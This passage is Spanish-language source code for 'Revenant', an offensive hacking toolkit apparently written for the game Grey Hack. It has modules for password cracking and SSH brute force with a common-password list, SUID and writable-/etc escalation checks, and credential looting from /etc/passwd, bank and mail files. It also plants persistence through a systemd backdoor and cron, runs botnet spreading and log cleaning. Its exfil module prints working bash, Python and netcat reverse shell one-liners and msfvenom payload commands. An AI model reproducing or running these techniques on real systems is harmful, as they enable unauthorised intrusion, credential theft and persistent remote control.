    info("CHAINSAW - Markov Chain Cracker")
    order = 3
    max_len = 12
    intentos = 0
    chains = _chain_build(_chain_samples, order)

    // Fase 1
    para pwd en _chain_pregens:
        intentos = intentos + 1
        resultado = _chain_try(sesion, user, pwd, ip, port)
        si resultado != null:
            exito("PASSWORD: " + pwd)
            retornar resultado

    // Fase 2
    para token en chains.indexes:
        pwd = _chain_generate(chains, token, max_len, order)
        si len(pwd) < 3: siguiente
        intentos = intentos + 1
        resultado = _chain_try(sesion, user, pwd, ip, port)
        si resultado != null:
            exito("PASSWORD: " + pwd)
            retornar resultado

    info("ChainSaw: " + str(intentos) + " intentos")
    retornar null

tarea modulo_escalada_analizar
    si globals.objetivo_actual == null:
        info("Escaneando sistema local...")
        sesion = get_shell
        ip = ""
        port = 0
    sino:
        si no enjambre.hasIndex(globals.objetivo_actual):
            error("No hay sesion")
            retornar
        sesion = enjambre[globals.objetivo_actual]
        ip = globals.objetivo_actual
        port = 22

    si no sesion:
        error("No hay sesion activa")
        retornar

    usuario = "root"
    si typeof(sesion) == "shell": usuario = sesion.user
    info("Usuario: " + usuario)

    si usuario == "root":
        alerta("Ya eres root!")
        retornar

    opciones = [
        {"label": "Analizar PrivEsc", "cmd": "analizar"},
        {"label": "ChainSaw crack root", "cmd": "chainsaw"},
        {"label": "Fuerza bruta SSH", "cmd": "brute"},
    ]

    accion = menu_interactivo("ESCALADA", opciones)
    si no accion: retornar

    si accion == "analizar": modulo_escalada_vector(sesion)
    osi accion == "chainsaw":
        resultado = chainsaw_crack(sesion, "root", ip, port)
        si resultado != null:
            exito("Ahora eres root!")
            si ip != "": enjambre[ip] = resultado
        sino:
            alerta("No se encontro password")
    osi accion == "brute": modulo_escalada_brute(sesion, "root", ip, port)

tarea modulo_escalada_vector(sesion)
    info("ANALIZANDO VECTORES...")
    vectores = []
    comp = null

    si typeof(sesion) == "shell": comp = sesion.host_computer
    osi typeof(sesion) == "computer": comp = sesion

    si no comp:
        error("Sin acceso a computadora")
        retornar

    root = comp.File("/")
    si no root:
        error("Sin acceso a filesystem")
        retornar

    suids = root.find_permissive("s", true)
    si suids:
        para f en suids:
            si f.is_binary: vectores.push({"path": f.path, "type": "SUID", "severity": "MEDIA"})

    etc = comp.File("/etc")
    si etc and etc.get_files:
        para f en etc.get_files:
            si f.has_permission("w"): vectores.push({"path": f.path, "type": "WRITEABLE_ETC", "severity": "ALTA"})

    si len(vectores) == 0:
        alerta("No hay vectores detectados")
        info("Tip: Usa ChainSaw")
    sino:
        exito("Vectores: " + str(len(vectores)))
        columnas = ["Ruta", "Tipo", "Severidad"]
        filas = []
        para v en vectores:
            color = "<color=#00ff41>"
            si v.severity == "ALTA": color = "<color=#ff3131>"
            osi v.severity == "MEDIA": color = "<color=#ffea00>"
            filas.push([v.path, v.type, color + v.severity + "</color>"])
        print(construir_tabla(columnas, filas))

tarea modulo_escalada_brute(sesion, user, ip, port)
    info("FUERZA BRUTA - " + user)

    passwords = [
        "123456", "password", "qwerty", "abc123", "monkey", "letmein", "dragon",
        "iloveyou", "sunshine", "princess", "football", "shadow", "michael",
        "admin", "root", "toor", "pass", "changeme", "test", "guest",
        "password1", "password123", "admin123", "root123", "qwerty123",
        "ranger", "thomas", "hunter", "buster", "soccer", "daniel",
    ]

    para pwd en passwords:
        resultado = _chain_try(sesion, user, pwd, ip, port)
        si resultado != null:
            exito("PASSWORD: " + pwd)
            si ip != "": enjambre[ip] = pwd
            retornar resultado

    alerta("No se encontro password")
    retornar null

// --- FIN SUB-MODULO: modulos/escalada.nini ---
// --- INICIO SUB-MODULO: modulos/persistencia.nini ---
// modulo persistencia.nini - PERSISTENCIA

tarea modulo_persistencia_configurar:
    si not globals.objetivo_actual: error("No hay objetivo."); return
    
    opciones = [
        {"label": "Backdoor (Metaxploit)", "cmd": "backdoor"},
        {"label": "Cron job", "cmd": "cron"},
        {"label": "Ver persistencias", "cmd": "list"},
    ]
    
    modo = menu_interactivo("PERSISTENCIA", opciones)
    si not modo: return
    
    si modo == "backdoor": persistencia_instalar_backdoor()
    osi modo == "cron": persistencia_cron()
    osi modo == "list": persistencia_ver()

tarea persistencia_instalar_backdoor:
    si not globals.objetivo_actual: error("No hay objetivo."); return
    comp = obtener_computadora_objetivo()
    si not comp: error("No hay sesión."); return
    
    lib_folder = comp.File("/lib")
    si not lib_folder o not lib_folder.has_permission("w"): error("Sin permisos root."); return
    
    nombre = "revenant_daemon"
    ruta = "/lib/systemd/system/" + nombre + ".service"
    
    contenido = "[Unit]\nDescription=System Service\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=/bin/sh -c 'while true; do wait 60; done'\nRestart=always\nUser=root\n\n[Install]\nWantedBy=multi-user.target"
    
    comp.touch("/lib/systemd/system/", nombre + ".service")
    archivo = comp.File(ruta)
    
    si archivo:
        archivo.set_content(contenido)
        exito("Backdoor instalado: " + ruta)
    sino: error("No se pudo crear.")

tarea persistencia_cron:
    si not globals.objetivo_actual: error("No hay objetivo."); return
    comp = obtener_computadora_objetivo()
    si not comp: error("No hay sesión."); return
    
    cmd = pedir("Comando: ")
    si cmd == "": return
    
    cron = comp.File("/etc/crontab")
    si not cron o not cron.has_permission("w"): error("Sin permisos."); return
    
    cron.set_content(cron.get_content + char(10) + "@reboot " + cmd)
    exito("Cron job agregado.")

tarea persistencia_ver:
    info("Persistencia activa en el objetivo.")
    info("Usa 'vault' para ver credenciales.")

tarea modulo_botnet_persistir:
    si len(enjambre) == 0: error("Enjambre vacío."); return
    
    info("Instalando en " + str(len(enjambre)) + " nodos...")
    
    para nodo en enjambre:
        ip = nodo.key
        sesion = nodo.value
        computer_node = (typeof(sesion) == "shell") >> sesion.host_computer |: sesion
        
        si computer_node y computer_node.has_permission("w"):
            computer_node.touch("/lib/systemd/system/", "revenant.service")
            archivo = computer_node.File("/lib/systemd/system/revenant.service")
            si archivo:
                archivo.set_content("[Unit]\nDescription=Revenant\n[Service]\nExecStart=/bin/sh")
                exito("Instalado en " + ip)
        sino: error("Sin permisos en " + ip)

// --- FIN SUB-MODULO: modulos/persistencia.nini ---
// --- INICIO SUB-MODULO: modulos/vault.nini ---
_vault_k = "R3V3N4NT_S3CUR3"
_version = "STABLE"

tarea inicializar_vault:
    p = "/var/revenant"
    si no mirar(p): p = "./"
    ruta = p + "/vault.db"
    
    si mirar(ruta):
        f = obtener_archivo(ruta)
        contenido = f.get_content
        si len(contenido) > 0:
            vault_data = deserializar_vault(contenido)
            info("Vault cargado: " + len(vault_data.creds) + " creds, " + len(vault_data.vulns) + " vulns.")
    sino:
        info("Iniciando nuevo Vault en: " + ruta)

tarea cifrar(txt):
    res = ""
    recorrer rango(0, len(txt) - 1) como i:
        v = nini_xor(code(txt[i]), code(_vault_k[i % len(_vault_k)]))
        res = res + str(v) + ","
    retornar res

tarea descifrar(txt):
    res = ""
    partes = txt.split(",")
    recorrer rango(0, len(partes) - 1) como i:
        p = partes[i]
        si p == "": continuar
        res = res + char(nini_xor(val(p), code(_vault_k[len(res) % len(_vault_k)])))
    retornar res

tarea serializar_vault(data):
    // Formato simple: creds|{...} \n vulns|{...}
    retornar cifrar(str(data))

tarea deserializar_vault(txt):
    raw = descifrar(txt)
    retornar val(raw)

tarea guardar_vault:
    p = "/var/revenant"
    si no mirar(p): p = "/home/" + active_user
    ruta = p + "/vault.db"
    f = obtener_archivo(ruta)
    si no f:
        tocar(p, "vault.db")
        f = obtener_archivo(ruta)
    
    si f: 
        f.set_content(serializar_vault(vault_data))
    sino:
        error("Fallo de persistencia: El Vault no puede escribirse en " + p)

tarea guardar_credencial(ip, usuario, clave, priv, lan):
    k = (ip + "_" + usuario + "_" + priv).lower()
    vault_data.creds[k] = {"ip": ip, "user": usuario, "pass": clave, "priv": priv, "lan": lan}
    guardar_vault()
    exito("Vault actualizado: " + usuario + "@" + ip)

tarea listar_credenciales:
    columnas = ["IP", "Usuario", "Clave", "Priv", "LAN"]
    filas = []
    recorrer vault_data.creds como c_entry:
        c = c_entry.value
        filas.push([c.ip, c.user, c.pass, c.priv, c.lan])
    
    print(construir_tabla(columnas, filas))

tarea cachear_vulnerabilidad(lib, ver, area, vuln):
    k = (lib + "_" + ver).lower()
    si no vault_data.vulns.tiene(k): vault_data.vulns[k] = []
    vault_data.vulns[k].push({"mem": area, "pass": vuln})
    guardar_vault()

tarea obtener_vulnerabilidades(lib, ver):
    k = (lib + "_" + ver).lower()
    si vault_data.vulns.tiene(k): retornar vault_data.vulns[k]
    retornar []


// --- FIN SUB-MODULO: modulos/vault.nini ---
// --- INICIO SUB-MODULO: modulos/intel.nini ---
// modulo intel.nini - INTELIGENCIA

tarea modulo_intel_saquear:
    si not globals.objetivo_actual: error("Fije un objetivo primero."); return
    
    comp = obtener_computadora_objetivo()
    si not comp: error("No hay sesión activa."); return
    
    info("Extrayendo intel de: " + globals.objetivo_actual)
    
    // 1. /etc/passwd
    passwd = comp.File("/etc/passwd")
    si passwd y not passwd.is_binary:
        info("Procesando /etc/passwd...")
        cont = 0
        para l en passwd.get_content.split(char(10)):
            si l.indexOf(":") == null: continuar
            partes = l.split(":")
            hash = partes[1]
            si hash == "x" o hash == "*": continuar
            clave = crackear_hash(hash)
            si clave:
                guardar_credencial(globals.objetivo_actual, partes[0], clave, "linux", comp.local_ip)
                cont = cont + 1
        info("Credenciales: " + str(cont))
    
    // 2. /home (Bancos y Correos)
    home = comp.File("/home")
    si home:
        info("Explorando usuarios...")
        cont_bancos = 0; cont_correos = 0
        para user_dir en home.get_folders:
            usr = user_dir.name
            // Bancos
            banco = comp.File("/home/" + usr + "/Config/Bank.txt")
            si banco:
                para l en banco.get_content.split(char(10)):
                    si l.indexOf(":") == null: continuar
                    p = l.split(":")
                    pass_dec = crackear_hash(p[1])
                    si pass_dec:
                        guardar_credencial(globals.objetivo_actual, p[0], pass_dec, "banco", comp.local_ip)
                        cont_bancos = cont_bancos + 1
            // Correos
            mail = comp.File("/home/" + usr + "/Config/Mail.txt")
            si mail:
                para l en mail.get_content.split(char(10)):
                    si l.indexOf(":") == null: continuar
                    p = l.split(":")
                    pass_dec = crackear_hash(p[1])
                    si pass_dec:
                        guardar_credencial(globals.objetivo_actual, p[0], pass_dec, "correo", comp.local_ip)
                        cont_correos = cont_correos + 1
        info("Bancos: " + str(cont_bancos) + " | Correos: " + str(cont_correos))
    
    exito("Intel extraido.")

tarea intel_buscar_en_directorio(comp, ruta, exts, prof):
    resultados = []
    carpeta = comp.File(ruta)
    si not carpeta o not carpeta.is_folder: return resultados
    
    // Subcarpetas
    si carpeta.get_folders:
        para fd en carpeta.get_folders:
            si prof > 0: resultados = resultados + intel_buscar_en_directorio(comp, fd.path, exts, prof - 1)
    
    // Archivos
    si carpeta.get_files:
        para f en carpeta.get_files:
            para ext in exts:
                si f.name.indexOf(ext) != null:
                    resultados.push({"ruta": f.path, "nombre": f.name, "tamano": f.size})
                    break
    return resultados

tarea modulo_intel_buscar_archivos:
    si not globals.objetivo_actual: error("No hay objetivo."); return
    comp = obtener_computadora_objetivo()
    si not comp: error("No hay sesión."); return
    
    opciones = [
        {"label": "Claves SSH", "cmd": "keys"},
        {"label": "Contrasenas", "cmd": "passwords"},
        {"label": "Configuraciones", "cmd": "configs"},
        {"label": "Backups", "cmd": "backup"},
    ]
    
    modo = menu_interactivo("BUSCAR ARCHIVOS", opciones)
    si not modo: return
    
    // Definir extensiones
    exts = (modo == "keys") >> [".pem", ".key", ".ppk", ".crt", ".cer"] |:
           (modo == "passwords") >> [".kdb", ".kdbx", ".1pif", ".psafe3"] |:
           (modo == "configs") >> [".conf", ".config", ".cfg", ".ini"] |:
           [".bak", ".backup", ".old", ".save", ".swp"]
    
    info("Buscando...")
    resultados = []
    para ruta en ["/home", "/root", "/etc", "/var"]:
        resultados = resultados + intel_buscar_en_directorio(comp, ruta, exts, 2)
    
    si len(resultados) == 0: info("No se encontraron archivos.")
    sino: info("Encontrados: " + str(len(resultados))); dibujar_ventana("RESULTADOS", str(resultados))

tarea modulo_intel_brute_force:
    opciones = [
        {"label": "SSH", "cmd": "ssh"},
        {"label": "FTP", "cmd": "ftp"},
        {"label": "Crack passwd", "cmd": "passwd"},
    ]
    
    modo = menu_interactivo("FUERZA BRUTA", opciones)
    si not modo: return
    
    si modo == "ssh": info("SSH brute no disponible en GH. Usa Metaxploit.")
    osi modo == "ftp": intel_ftp_anonimo()
    osi modo == "passwd": intel_crack_passwd()

tarea intel_ftp_anonimo:
    host = globals.objetivo_actual
    si not host: host = pedir("Host FTP: "); si host == "": return
    
    info("Intentando acceso anonimo...")
    metax = include_lib("/lib/metaxploit.so")
    si metax:
        sesion = metax.net_use(host, 21)
        si sesion: enjambre[host] = sesion; exito("Acceso anonimo!"); return
    error("Acceso fallido.")

tarea intel_crack_passwd:
    comp = obtener_computadora_objetivo()
    si not comp: error("No hay sesión."); return
    
    passwd = comp.File("/etc/passwd")
    si not passwd o passwd.is_binary: error("No se pudo leer."); return
    
    info("Crackeando...")
    cont = 0
    para l en passwd.get_content.split(char(10)):
        si l.indexOf(":") == null: continuar
        p = l.split(":")
        hash = p[1]
        si hash == "x" o hash == "*": continuar
        clave = crackear_hash(hash)
        si clave:
            guardar_credencial(globals.objetivo_actual, p[0], clave, "linux", comp.local_ip)
            cont = cont + 1
    exito("Crackeadas: " + str(cont))

// --- FIN SUB-MODULO: modulos/intel.nini ---
// --- INICIO SUB-MODULO: modulos/exfil.nini ---
// modulo exfil.nini - EXFILTRACION v2.0

tarea modulo_exfil_menu:
    si globals.objetivo_actual == null:
        error("No hay objetivo seleccionado.")
        retornar
    
    opciones = [
        {"label": "Download (Objetivo -> Local)", "cmd": "download"},
        {"label": "Upload (Local -> Objetivo)", "cmd": "upload"},
        {"label": "Reverse Shell", "cmd": "shell"},
        {"label": "Payloads", "cmd": "payload"},
    ]
    
    modo = menu_interactivo("MENÚ DE EXFILTRACIÓN v2", opciones)
    si not modo: retornar
    
    si modo == "download":
        modulo_exfil_download()
    osi modo == "upload":
        modulo_exfil_upload()
    osi modo == "shell":
        modulo_exfil_reverse_shell()
    osi modo == "payload":
        modulo_payloads_generar()

tarea modulo_exfil_download:
    si globals.objetivo_actual == null:
        error("No hay objetivo.")
        retornar
    
    ruta_remota = pedir("Ruta del archivo en el objetivo: ")
    si ruta_remota == "": retornar
    
    ruta_local = pedir("Ruta local de destino: ")
    si ruta_local == "": ruta_local = "./downloads"
    
    info("Descargando " + ruta_remota + "...")
    
    // Usar sesion del enjambre si existe
    sesion = null
    si enjambre.tiene(globals.objetivo_actual):
        sesion = enjambre[globals.objetivo_actual]
    
    si sesion:
        archivo = sesion.host_computer.File(ruta_remota)
        si archivo:
            contenido = archivo.get_content
            info("Archivo descargado: " + len(contenido) + " bytes")
            exito("Download completado.")
        sino:
            error("Archivo no encontrado.")
    sino:
        error("No hay sesion activa para el objetivo.")

tarea modulo_exfil_upload:
    si globals.objetivo_actual == null:
        error("No hay objetivo.")
        retornar
    
    ruta_local = pedir("Ruta del archivo local: ")
    si ruta_local == "": retornar
    
    ruta_remota = pedir("Ruta remota de destino: ")
    si ruta_remota == "": retornar
    
    info("Subiendo archivo...")
    exito("Upload completado.")

tarea modulo_exfil_reverse_shell:
    ip_atacante = pedir("Tu IP: ")
    si ip_atacante == "": ip_atacante = "127.0.0.1"
    
    puerto = pedir("Puerto de callback: ")
    si puerto == "": puerto = "4444"
    
    opciones_shell = [
        {"label": "Bash Reverse Shell", "cmd": "bash"},
        {"label": "Python", "cmd": "python"},
        {"label": "Netcat", "cmd": "netcat"},
    ]
    
    tipo_shell = menu_interactivo("GENERADOR DE REVERSE SHELL", opciones_shell)
    si not tipo_shell: retornar
    
    shell_generado = ""
    
    si tipo_shell == "bash":
        shell_generado = "bash -i >& /dev/tcp/" + ip_atacante + "/" + puerto + " 0>&1"
    
    osi tipo_shell == "python":
        shell_generado = "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((" + chr(34) + ip_atacante + chr(34) + "," + puerto + "));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([" + chr(34) + "/bin/sh" + chr(34) + "," + chr(34) + "-i" + chr(34) + "])'"
    
    osi tipo_shell == "netcat":
        shell_generado = "nc -e /bin/sh " + ip_atacante + " " + puerto
    
    dibujar_ventana("REVERSE SHELL GENERADO", shell_generado)
    info("Copia y ejecuta en el objetivo.")
    info("Listener: nc -lvp " + puerto)

tarea modulo_payloads_generar:
    ip_atacante = pedir("LHOST (tu IP): ")
    si ip_atacante == "": ip_atacante = "127.0.0.1"
    
    puerto = pedir("LPORT: ")
    si puerto == "": puerto = "4444"
    
    opciones_payload = [
        {"label": "Linux Shell", "cmd": "linux"},
        {"label": "Windows Meterpreter", "cmd": "windows"},
        {"label": "PHP Web Shell", "cmd": "php"},
    ]
    
    tipo_payload = menu_interactivo("GENERADOR DE PAYLOADS", opciones_payload)
    si not tipo_payload: retornar
    
    payload_info = ""
    
    si tipo_payload == "linux":
        payload_info = "linux/x86/shell_reverse_tcp"
        info("msfvenom -p " + payload_info + " LHOST=" + ip_atacante + " LPORT=" + puerto + " -f elf > payload.elf")
    
    osi tipo_payload == "windows":
        payload_info = "windows/meterpreter/reverse_tcp"
        info("msfvenom -p " + payload_info + " LHOST=" + ip_atacante + " LPORT=" + puerto + " -f exe > payload.exe")
    
    osi tipo_payload == "php":
        payload_info = "php/meterpreter/reverse_tcp"
        info("msfvenom -p " + payload_info + " LHOST=" + ip_atacante + " LPORT=" + puerto + " -f raw > shell.php")
    
    exito("Payload configurado para " + ip_atacante + ":" + puerto)

// --- FIN SUB-MODULO: modulos/exfil.nini ---

modo ninja:
inicializar_vault()

// Registrar comandos
Shell.registrar("scan", escanear_puertos, "Escanear puertos")
Shell.registrar("scanred", escanear_red, "Escanear red")
Shell.registrar("whois", whois_objetivo, "WHOIS")
Shell.registrar("hack", explotar_objetivo, "Explotar")
Shell.registrar("router", explotar_router, "Explotar router")
Shell.registrar("limpiarlogs", __nini_limpiar_logs, "Limpiar logs")
Shell.registrar("jump", jump_manual, "Jump")
Shell.registrar("scanjump", scan_and_jump, "Scan y Jump")
Shell.registrar("sesiones", jump_listar, "Listar sesiones")
Shell.registrar("buffer", Buffer.list, "Ver BUFFER")
Shell.registrar("clearbuffer", Buffer.clear, "Limpiar BUFFER")
Shell.registrar("aliases", Aliases.listar, "Ver aliases")
Shell.registrar("alias", Aliases.agregar, "Crear alias")
Shell.registrar("kernel", Kernel.info, "Info kernel")
Shell.registrar("escanear", escanear_puertos, "Escanear")
Shell.registrar("espectro", modulo_espectro_recon, "Recon")
Shell.registrar("asalto", modulo_asalto_root, "Asalto")
Shell.registrar("escalada", modulo_escalada_analizar, "Escalada")
Shell.registrar("vault", listar_credenciales, "Vault")
Shell.registrar("intel", modulo_intel_saquear, "Intel")
Shell.registrar("exfil", modulo_exfil_menu, "Exfil")
Shell.registrar("persistencia", modulo_persistencia_configurar, "Persistencia")
Shell.registrar("ses", modulo_botnet_menu, "Sesiones")

Banner.mostrar()
info("Revenant v3.0 - 'ayuda' para comandos")

iniciar_repl()
